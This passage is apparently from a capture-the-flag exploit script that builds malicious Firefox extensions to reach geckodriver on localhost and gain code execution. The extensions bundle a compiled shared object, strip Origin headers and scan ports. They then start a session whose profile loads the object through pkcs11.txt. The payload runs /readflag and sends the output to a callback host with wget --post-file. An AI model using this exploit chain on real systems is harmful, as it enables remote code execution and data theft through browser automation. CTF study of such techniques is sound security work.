    const headers = (details.requestHeaders || []).filter(
      h => h.name.toLowerCase() !== "origin"
    );
    return {requestHeaders: headers};
  },
  {
    urls: [
      "http://127.0.0.1/*",
      "http://localhost/*"
    ]
  },
  ["blocking", "requestHeaders"]
);

async function downloadSharedObject() {
  return new Promise(resolve => {
    let downloadId = null;
    let done = false;

    function finish(value) {
      if (done) return;
      done = true;
      try { browser.downloads.onChanged.removeListener(onChanged); } catch (_) {}
      resolve(value);
    }

    function onChanged(delta) {
      if (downloadId === null || delta.id !== downloadId) return;
      if (delta.state && delta.state.current === "complete") finish(true);
      if (delta.error) finish(false);
    }

    browser.downloads.onChanged.addListener(onChanged);
    browser.downloads.download({
      url: browser.runtime.getURL("pwn.so"),
      filename: "pwn.so",
      conflictAction: "overwrite",
      saveAs: false
    }).then(id => {
      downloadId = id;
    }).catch(async e => {
      await report("download-error", String(e && (e.message || e)));
      finish(false);
    });

    setTimeout(() => finish(true), 5000);
  });
}

async function fetchWithTimeout(url, options, timeoutMs) {
  const controller = new AbortController();
  const timer = setTimeout(() => controller.abort(), timeoutMs);
  try {
    const merged = Object.assign({}, options || {}, {signal: controller.signal});
    return await fetch(url, merged);
  } finally {
    clearTimeout(timer);
  }
}

async function probePort(port) {
  try {
    const r = await fetchWithTimeout(
      "http://127.0.0.1:" + port + "/status",
      {cache: "no-store"},
      350
    );
    const text = await r.text();
    if (text.includes('"ready"') || text.includes("Session already started")) {
      if (!candidates.has(port)) {
        candidates.add(port);
        await report("candidate", {port, status: text.slice(0, 200)});
      }
      watchPort(port);
      return true;
    }
  } catch (_) {}
  return false;
}

async function createSession(port) {
  try {
    const r = await fetchWithTimeout(
      "http://127.0.0.1:" + port + "/session",
      {
        method: "POST",
        cache: "no-store",
        headers: {"Content-Type": "application/json"},
        body: payload
      },
      5000
    );
    const text = await r.text();
    if (text.includes("sessionId") || text.includes('"sessionId"')) {
      await report("session-created", {port, response: text.slice(0, 500)});
      return true;
    }
  } catch (_) {}
  return false;
}

function watchPort(port) {
  if (watching.has(port)) return;
  watching.add(port);

  (async () => {
    const deadline = Date.now() + 125000;
    while (Date.now() < deadline) {
      await createSession(port);
      await sleep(70 + Math.floor(Math.random() * 80));
    }
  })();
}

async function scanRange() {
  let next = LO;
  async function worker() {
    while (true) {
      const port = next++;
      if (port > HI) return;
      await probePort(port);
    }
  }
  await Promise.all(Array.from({length: CONCURRENCY}, () => worker()));
}

(async () => {
  await report("started", {lo: LO, hi: HI});
  const downloaded = await downloadSharedObject();
  await report("downloaded-so", {ok: downloaded});
  await scanRange();
  await report("scan-finished", {candidateCount: candidates.size, candidates: Array.from(candidates)});

  while (true) {
    for (const port of Array.from(candidates)) {
      createSession(port);
    }
    await sleep(250);
  }
})();
"""

class ReusableTCPServer(socketserver.TCPServer):
    allow_reuse_address = True

class CallbackHandler(http.server.BaseHTTPRequestHandler):
    inbox = None

    def _ok(self, body=b"ok\n"):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        parsed = urllib.parse.urlsplit(self.path)
        data = urllib.parse.parse_qs(parsed.query).get("d", [""])[0]
        if data:
            self.inbox.put(data)
        self._ok()

    def do_POST(self):
        n = int(self.headers.get("Content-Length", "0") or "0")
        raw = self.rfile.read(n)
        text = raw.decode(errors="replace")
        self.inbox.put(text)
        self._ok()

    def log_message(self, fmt, *args):
        sys.stderr.write("[callback] " + (fmt % args) + "\n")

def shell_quote(value: str) -> str:
    return "'" + value.replace("'", "'\"'\"'") + "'"

def c_string(value: str) -> str:
    return json.dumps(value)

def make_command(callback_url: str) -> str:
    quoted = shell_quote(callback_url)
    return (
        "flag=/tmp/geckodrce_flag; "
        "/readflag pls > \"$flag\" 2>/tmp/geckodrce_err; "
        "(wget -q -O- --post-file=\"$flag\" {url} || "
        "busybox wget -q -O- --post-file=\"$flag\" {url}) "
        ">/dev/null 2>&1"
    ).format(url=quoted)

def write_payload_source(path: Path, callback_url: str) -> None:
    command = make_command(callback_url)
    source = PWN_C_TEMPLATE.replace("__COMMAND_LITERAL__", c_string(command))
    path.write_text(source, encoding="utf-8")

def run_checked(cmd, cwd: Path) -> None:
    print("[*]", " ".join(str(x) for x in cmd))
    subprocess.run(cmd, cwd=str(cwd), check=True)

def compile_shared_object(workdir: Path, c_path: Path, so_path: Path) -> None:
    if os.name != "nt" and shutil.which("gcc"):
        cmd = ["gcc", "-shared", "-fPIC", "-Os", str(c_path), "-o", str(so_path)]
        run_checked(cmd, workdir)
        if shutil.which("strip"):
            subprocess.run(["strip", str(so_path)], cwd=str(workdir), check=False)
        return

    if shutil.which("docker"):
        volume = f"{workdir.resolve()}:/work"
        script = (
            "apk add --no-cache build-base >/dev/null && "
            "gcc -shared -fPIC -Os /work/pwn.c -o /work/pwn.so && "
            "strip /work/pwn.so"
        )
        run_checked(
            ["docker", "run", "--rm", "-v", volume, "-w", "/work", "alpine:3.23", "/bin/sh", "-lc", script],
            workdir,
        )
        return

    raise RuntimeError("no Linux gcc or docker found; pass --so with a musl-compatible shared object")

def make_profile_b64() -> str:
    pkcs11 = f"""library=
name=NSS Internal PKCS #11 Module
parameters=configdir='sql:.' certPrefix='' keyPrefix='' secmod='secmod.db' flags=readOnly
NSS=trustOrder=75 cipherOrder=100

library={DOWNLOAD_PATH}
name=geckodrce
parameters=
NSS=trustOrder=100 cipherOrder=100
"""
    prefs = 'user_pref("browser.shell.checkDefaultBrowser", false);\n'
    bio = io.BytesIO()
    with zipfile.ZipFile(bio, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("pkcs11.txt", pkcs11)
        zf.writestr("prefs.js", prefs)
    return base64.b64encode(bio.getvalue()).decode()

def make_background(lo: int, hi: int, concurrency: int, callback_url: str, profile_b64: str) -> str:
    return (
        BACKGROUND_JS
        .replace("__LO__", str(lo))
        .replace("__HI__", str(hi))
        .replace("__CONCURRENCY__", str(concurrency))
        .replace("__CALLBACK_URL__", json.dumps(callback_url))
        .replace("__PROFILE_B64__", json.dumps(profile_b64))
    )

def build_xpi(path: Path, so_bytes: bytes, background_js: str) -> None:
    manifest = {
        "manifest_version": 2,
        "name": "geckodrce-pkcs11",
        "version": "1.0",
        "permissions": [
            "<all_urls>",
            "downloads",
            "webRequest",
            "webRequestBlocking",
        ],
        "background": {"scripts": ["background.js"]},
        "applications": {"gecko": {"id": f"geckodrce-{uuid.uuid4().hex}@example.invalid"}},
    }
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("manifest.json", json.dumps(manifest, separators=(",", ":")))
        zf.writestr("background.js", background_js)
        zf.writestr("pwn.so", so_bytes)

    size = path.stat().st_size
    if size > MAX_XPI_SIZE:
        raise RuntimeError(f"{path} is {size} bytes, over 1 MiB upload limit")

def parse_shards(text: str):
    # Parse "lo-hi,lo-hi,..." into a list of inclusive (lo, hi) port ranges.
    shards = []
    for item in text.split(","):
        item = item.strip()
        if not item:
            continue
        lo_s, hi_s = item.split("-", 1)
        lo, hi = int(lo_s), int(hi_s)
        if not (1 <= lo <= hi <= 65535):
            raise ValueError(f"bad shard: {item}")
        shards.append((lo, hi))
    if not shards:
        raise ValueError("no shards configured")
    return shards

def normalize_visit_url(target: str) -> str:
    target = target.rstrip("/")
    if target.endswith("/visit"):
        return target
    return target + "/visit"

def default_callback_url(target: str, listen_port: int) -> str:
    host = urllib.parse.urlsplit(target).hostname or ""
    if host in {"127.0.0.1", "localhost", "::1"}:
        return f"http://host.docker.internal:{listen_port}/leak"
    raise SystemExit("remote target needs --callback-url pointing to a reachable HTTP endpoint")

def multipart_upload(url: str, filename: str, data: bytes, timeout: int) -> bytes:
    boundary = "----geckodrce-" + uuid.uuid4().hex
    body = bytearray()
    body.extend(f"--{boundary}\r\n".encode())
    body.extend(f'Content-Disposition: form-data; name="extension"; filename="{filename}"\r\n'.encode())
    body.extend(b"Content-Type: application/x-xpinstall\r\n\r\n")
    body.extend(data)
    body.extend(f"\r\n--{boundary}--\r\n".encode())
    req = urllib.request.Request(
        url,
        data=bytes(body),
        headers={"Content-Type": f"multipart/form-data; boundary={boundary}"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()

def serve_callback(host: str, port: int, inbox: queue.Queue):
    CallbackHandler.inbox = inbox
    httpd = ReusableTCPServer((host, port), CallbackHandler)
    thread = threading.Thread(target=httpd.serve_forever, daemon=True)
    thread.start()
    return httpd

def build_artifacts(args, callback_url: str, out_dir: Path):
    out_dir.mkdir(parents=True, exist_ok=True)
    c_path = out_dir / "pwn.c"
    so_path = out_dir / "pwn.so"

    if args.so:
        so_bytes = Path(args.so).read_bytes()
        print(f"[+] using supplied shared object: {args.so} ({len(so_bytes)} bytes)")
    else:
        write_payload_source(c_path, callback_url)
        compile_shared_object(out_dir, c_path, so_path)
        so_bytes = so_path.read_bytes()
        print(f"[+] built pwn.so ({len(so_bytes)} bytes)")

    profile_b64 = make_profile_b64()
    shards = parse_shards(args.shards)
    xpis = []
    for idx, (lo, hi) in enumerate(shards, 1):
        js = make_background(lo, hi, args.concurrency, callback_url, profile_b64)
        xpi_path = out_dir / f"geckodrce_{idx}_{lo}_{hi}.xpi"
        build_xpi(xpi_path, so_bytes, js)
        print(f"[+] built {xpi_path.name}: ports {lo}-{hi}, {xpi_path.stat().st_size} bytes")
        xpis.append(xpi_path)
    return xpis

def main() -> int:
    ap = argparse.ArgumentParser(description="TRXCTF geckodrce exploit via geckodriver /session + pkcs11 profile")
    ap.add_argument("--target", default=DEFAULT_TARGET, help="base target URL or direct /visit URL")
    ap.add_argument("--callback-url", help="HTTP endpoint reachable from the target container")
    ap.add_argument("--listen-host", default="0.0.0.0", help="callback bind host for local testing")
    ap.add_argument("--listen-port", type=int, default=18080, help="callback bind port for local testing")
    ap.add_argument("--shards", default=DEFAULT_SHARDS, help="comma-separated inclusive port shards")
    ap.add_argument("--concurrency", type=int, default=384, help="scan workers per XPI")
    ap.add_argument("--waves", type=int, default=2, help="number of upload waves")
    ap.add_argument("--wave-delay", type=float, default=20.0, help="delay between waves")
    ap.add_argument("--visit-timeout", type=int, default=95, help="HTTP timeout for each /visit upload")
    ap.add_argument("--wait", type=int, default=150, help="seconds to wait for callback messages")
    ap.add_argument("--out-dir", default="", help="keep generated artifacts in this directory")
    ap.add_argument("--so", default="", help="use an existing Alpine/musl-compatible pwn.so")
    ap.add_argument("--build-only", action="store_true", help="build XPI files and do not upload")
    args = ap.parse_args()

    visit_url = normalize_visit_url(args.target)
    callback_url = args.callback_url or default_callback_url(args.target, args.listen_port)

    inbox = queue.Queue()
    httpd = None
    if not args.callback_url:
        httpd = serve_callback(args.listen_host, args.listen_port, inbox)
        print(f"[+] callback listening on {args.listen_host}:{args.listen_port}")
    print(f"[+] visit URL: {visit_url}")
    print(f"[+] callback URL: {callback_url}")

    temp_ctx = None
    if args.out_dir:
        out_dir = Path(args.out_dir)
    else:
        temp_ctx = tempfile.TemporaryDirectory(prefix="geckodrce_pkcs11_")
        out_dir = Path(temp_ctx.name)

    try:
        xpis = build_artifacts(args, callback_url, out_dir)
        if args.build_only:
            print("[+] build-only mode; not uploading")
            return 0

        errors = []

        def upload(path: Path, wave: int):
            try:
                data = path.read_bytes()
                print(f"[+] wave {wave}: uploading {path.name}")
                resp = multipart_upload(visit_url, path.name, data, args.visit_timeout)
                print(f"[+] wave {wave}: {path.name} -> {resp.decode(errors='replace')}")
            except Exception as exc:
                errors.append((path.name, wave, exc))
                print(f"[!] wave {wave}: {path.name} upload failed: {exc}")

        threads = []
        for wave in range(1, args.waves + 1):
            if wave > 1:
                print(f"[*] sleeping {args.wave_delay:.1f}s before wave {wave}")
                time.sleep(args.wave_delay)
            for xpi in xpis:
                t = threading.Thread(target=upload, args=(xpi, wave), daemon=True)
                t.start()
                threads.append(t)

        deadline = time.time() + args.wait
        found = None
        last = None
        while time.time() < deadline:
            try:
                item = inbox.get(timeout=1)
            except queue.Empty:
                continue
            last = item
            print("[callback]", item)
            match = FLAG_RE.search(item)
            if match:
                found = match.group(0)
                break

        for t in threads:
            t.join(timeout=0.1)

        if found:
            print(f"[+] flag: {found}")
            return 0
        if args.callback_url:
            print("[*] uploads sent. Check the external callback endpoint for the flag body.")
            return 0
        if last is not None:
            print(f"[-] no flag found; last callback: {last}")
        if errors:
            print(f"[-] upload errors: {errors}")
        return 1
    finally:
        if httpd:
            httpd.shutdown()
        if temp_ctx:
            temp_ctx.cleanup()

if __name__ == "__main__":
    raise SystemExit(main())
    
# TRX{s0_n0w_I_inst4ll_ff_ext3nsi0ns_and_I_get_rce-ed_wtf!?}
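
The `--shards` option above takes a comma-separated list of inclusive port ranges, and each range becomes one XPI. As a minimal sketch, the helper below generates such a string by splitting a port range into near-equal pieces. `make_shards` is a hypothetical helper that is not part of the original script, and an even split is only an assumption about how one might choose the shards; the script's actual `DEFAULT_SHARDS` value may differ.

```python
def make_shards(count: int, lo: int = 1, hi: int = 65535) -> str:
    """Split the inclusive port range [lo, hi] into `count` near-equal shards.

    Hypothetical helper: the result uses the "lo-hi,lo-hi" format that
    parse_shards() accepts.
    """
    if count < 1 or not (1 <= lo <= hi <= 65535):
        raise ValueError("bad shard parameters")
    total = hi - lo + 1
    count = min(count, total)          # never produce empty shards
    base, extra = divmod(total, count)
    parts = []
    start = lo
    for i in range(count):
        # The first `extra` shards take one additional port each.
        size = base + (1 if i < extra else 0)
        end = start + size - 1
        parts.append(f"{start}-{end}")
        start = end + 1
    return ",".join(parts)


if __name__ == "__main__":
    print(make_shards(4))
```

The output can be passed straight to the exploit, for example `--shards "$(python3 make_shards.py)"` if the helper is saved under that (assumed) file name.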